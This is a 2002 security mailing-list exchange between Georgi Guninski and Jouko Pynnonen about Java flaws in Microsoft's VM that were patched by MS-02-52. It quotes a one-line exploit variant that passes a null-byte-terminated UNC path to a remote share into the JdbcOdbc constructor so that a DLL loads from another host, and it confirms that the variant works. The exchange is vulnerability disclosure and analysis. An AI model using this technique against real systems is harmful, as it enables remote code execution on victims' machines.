[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
Message-ID: <3D8F44CD.7010606@guninski.com>
From: guninski at guninski.com (Georgi Guninski)
Subject: Technical information about the vulnerabilities
fixed by MS-02-52
Jouko Pynnonen wrote:
>
> On Mon, 23 Sep 2002, Georgi Guninski wrote:
>
>
>>Does
>>new com.ms.jdbc.odbc.JdbcOdbc("\\\\1.1.1.1\\share\\dll\000");
>>work?
>
>
>
> Yes, seems to work, so there's another way to exploit this one. It
> requires that browsing internet shares works, which may limit the systems
> where it can be exploited. Although there were other Java vulnerabilities
> involving the use of shares, I never came to think about this way. MS may
> have thought of this, but of course they don't mention this kind of
> things during the "co-operation".
>
>
Hehehehe - you don't expect microsoft to share info with you during
"co-operation", do you?
Powered by blists - more mailing lists